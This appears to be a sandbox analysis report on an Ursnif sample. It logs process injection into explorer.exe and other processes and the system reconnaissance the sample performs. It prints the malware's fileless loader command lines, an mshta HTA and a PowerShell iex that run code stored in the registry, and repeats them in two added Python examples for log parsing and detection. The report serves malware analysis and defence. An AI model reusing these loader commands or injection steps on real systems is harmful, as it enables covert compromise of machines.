Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 9D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 2D2D64A0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 9D0000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9FA000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2B60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9FC000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 30F0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD217F000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 660000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 2D2D64A0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9FA000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 2B60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9FC000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 30F0000 value: 80
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 6752
Source: C:\Windows\explorer.exe Thread register set: target process: 5288
Source: C:\Windows\explorer.exe Thread register set: target process: 1260
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe Thread register set: target process: 6508
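Read together, the entries from "Maps a DLL or memory area into another process" down to "Modifies the context of a thread in another process" describe one injection chain rather than isolated events: loaddll32/rundll32 into control.exe, powershell into explorer.exe, explorer into RuntimeBroker.exe and cmd.exe, control.exe into rundll32.exe and explorer.exe (the report ties PID 3424 to explorer.exe in the "Injects code into the Windows Explorer" entries, and control.exe sets the thread context of that same PID). Two details are worth a second look: the same address 7FFABD4F1580 is written and re-protected in every 64-bit target, and the "Thread created" EIP BD4F1580 is the low 32 bits of that address, so a single patch site drives all the injected threads. The bytes written there alternate EB and 40; 0xEB is the x86 short-JMP opcode and 0x40 is the REX prefix that opens many x64 function prologues, which reads like a two-byte patch being applied and restored. That reading is an interpretation, not something the report states. The Python below is an added example, not part of this report or of the sandbox; it parses a representative subset of the entries above (copied verbatim) into a source-to-target graph and pulls out exactly those two observations.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: a representative subset of the injection entries from this report.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 9D0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 9D0000
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 660000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 2D2D64A0000
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
""".strip().splitlines()

# One regex per event type; group 1 is the acting process, group 2 the target.
PATTERNS = {
    "section_mapped": re.compile(r"^Source: (\S+) Section loaded: unknown target: (\S+) protection: (.+)$"),
    "alloc": re.compile(r"^Source: (\S+) Memory allocated: (\S+) base: ([0-9A-Fa-f]+) protect: (.+)$"),
    "write": re.compile(r"^Source: (\S+) Memory written: (\S+) base: ([0-9A-Fa-f]+)$"),
    "protect": re.compile(r"^Source: (\S+) Memory protected: (\S+) base: ([0-9A-Fa-f]+) protect: (.+)$"),
    "thread": re.compile(r"^Source: (\S+) Thread created: (\S+) EIP: ([0-9A-Fa-f]+)$"),
    "context": re.compile(r"^Source: (\S+) Thread register set: target process: (\d+)$"),
}


def label(path: str) -> str:
    """Shorten a full path to 'parentdir\\name' so System32 and SysWOW64 copies stay distinct."""
    if "\\" not in path:
        return path  # "unknown"
    return "\\".join(path.split("\\")[-2:])


@dataclass
class InjectionGraph:
    edges: dict = field(default_factory=lambda: defaultdict(set))   # (src, dst) -> {event types}
    writes: dict = field(default_factory=lambda: defaultdict(set))  # address -> {targets written}
    eips: set = field(default_factory=set)                          # injected-thread start addresses


def parse(lines) -> InjectionGraph:
    """Build the source-to-target graph; each line contributes to exactly one edge."""
    g = InjectionGraph()
    for line in lines:
        for kind, rx in PATTERNS.items():
            m = rx.match(line)
            if not m:
                continue
            src = label(m.group(1))
            dst = f"pid:{m.group(2)}" if kind == "context" else label(m.group(2))
            g.edges[(src, dst)].add(kind)
            if kind == "write":
                g.writes[m.group(3).upper()].add(dst)
            elif kind == "thread":
                g.eips.add(m.group(3).upper())
            break
    return g


def chain(g: InjectionGraph):
    """Render the chain as 'source -> target [events]' lines, sorted for stable output."""
    return [f"{s} -> {d} [{', '.join(sorted(k))}]" for (s, d), k in sorted(g.edges.items())]


def shared_patch_sites(g: InjectionGraph):
    """Addresses written into more than one distinct target: one code site patched everywhere."""
    return {addr for addr, targets in g.writes.items() if len(targets) >= 2}


def eip_to_patch_site(g: InjectionGraph):
    """Map each thread-start EIP to a written address whose low 32 bits equal it; in this
    report the EIP field shows only the low half of the 64-bit address that was written."""
    out = {}
    for eip in g.eips:
        for addr in g.writes:
            if int(addr, 16) & 0xFFFFFFFF == int(eip, 16):
                out[eip] = addr
    return out


if __name__ == "__main__":
    graph = parse(SAMPLE)
    print("\n".join(chain(graph)))
    print("shared patch sites:", shared_patch_sites(graph))
    print("EIP -> patch site:", eip_to_patch_site(graph))
```

The "Thread register set" entries only carry a PID, so they become `pid:NNNN` nodes; resolving those requires the process tree elsewhere in the report, which this example does not parse.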
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
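The command lines in "Very long cmdline option found" and "Creates a process in suspended mode" show the whole stage hand-off without any file on disk: mshta.exe runs an inline HTA that regread()s the DeviceFile value under HKCU\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 and eval()s it; that script spawns powershell.exe, which reads the UtilTool value of the same key, decodes it as ASCII and iex-es it; PowerShell then compiles C# through csc.exe (the Temp\<random>\<random>.cmdline, .0.cs and .dll artifacts are what Add-Type leaves behind), and the injection chain above follows. On a live host the first thing to collect is therefore that registry key, because the stages only exist there. The Python below is an added detection example, not part of this report or of the sandbox: it runs a small rule set over process-creation entries copied from this report plus one constructed benign line, and scores them. Two caveats are built into the rules: csc.exe compiling from Temp is what any legitimate Add-Type call also does, so it is weighted low, and control.exe launching rundll32 Shell32.dll,Control_RunDLL is control.exe's normal behaviour, so the rule fires on control.exe's unusual parent (a DLL host) rather than on that hop. Rule names and weights are this example's own.

```python
import re
from dataclasses import dataclass
from ntpath import basename

# Constructed sample: process-creation entries from this report, plus one benign line
# (the notepad.exe entry) added here as a control to show that the rules do not fire on it.
SAMPLE = r"""
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\notepad.exe notepad.exe C:\Users\user\notes.txt
""".strip().splitlines()

# Parent and image paths carry no spaces in these entries; the command line is the rest.
PROC_RE = re.compile(
    r"^Source: (?P<parent>\S+) Process created: (?P<image>\S+) (?P<cmdline>.*?)(?: Jump to behavior)?$"
)


@dataclass(frozen=True)
class ProcEvent:
    parent: str
    image: str
    cmdline: str

    @property
    def parent_name(self) -> str:
        return basename(self.parent).lower()

    @property
    def image_name(self) -> str:
        return basename(self.image).lower()

    @property
    def cmd(self) -> str:
        return self.cmdline.lower()


def parse(lines):
    events = []
    for line in lines:
        m = PROC_RE.match(line)
        if m:
            events.append(ProcEvent(m["parent"], m["image"], m["cmdline"]))
    return events


SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
DLL_HOSTS = {"rundll32.exe", "loaddll32.exe", "regsvr32.exe"}

# (rule name, weight, predicate). Weights are this example's own triage scoring.
RULES = [
    ("mshta_inline_hta", 3,
     lambda e: e.image_name == "mshta.exe" and "about:<hta:application>" in e.cmd),
    ("mshta_reads_registry", 3,
     lambda e: e.image_name == "mshta.exe" and ".regread(" in e.cmd),
    ("powershell_iex_from_registry", 3,
     lambda e: e.image_name == "powershell.exe" and "iex" in e.cmd and "hkcu:" in e.cmd
     and (" gp " in e.cmd or "get-itemproperty" in e.cmd)),
    ("mshta_spawns_shell", 2,
     lambda e: e.parent_name == "mshta.exe" and e.image_name in SHELLS),
    # Add-Type compiles this way too, so on its own this is only a weak signal.
    ("csc_compiling_from_temp", 1,
     lambda e: e.image_name == "csc.exe" and "/noconfig" in e.cmd
     and "\\appdata\\local\\temp\\" in e.cmd),
    # control.exe -> rundll32 Shell32.dll,Control_RunDLL is normal; the anomaly is the DLL host parent.
    ("dll_host_spawns_control", 2,
     lambda e: e.image_name == "control.exe" and e.parent_name in DLL_HOSTS),
    ("external_ip_lookup", 1,
     lambda e: e.image_name == "nslookup.exe" and "myip.opendns.com" in e.cmd),
]


def detect(lines):
    """Return (rule, child image, parent image) for every rule that fires on every event."""
    hits = []
    for e in parse(lines):
        for name, _, pred in RULES:
            if pred(e):
                hits.append((name, e.image_name, e.parent_name))
    return hits


def score(lines) -> int:
    """Sum of the weights of all firing rules; the benign control line contributes nothing."""
    weights = {name: w for name, w, _ in RULES}
    return sum(weights[name] for name, _, _ in detect(lines))


if __name__ == "__main__":
    for hit in detect(SAMPLE):
        print(hit)
    print("score:", score(SAMPLE))
```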
Source: explorer.exe, 0000001C.00000000.922381772.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.884577351.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E4B105E
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD2E33 cpuid 0_2_00DD2E33
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6E4B109B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 0_2_00DD2E33
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457D8BC CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0457D8BC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E4B1C6F

Stealing of Sensitive Information:

Yara detected Ursnif
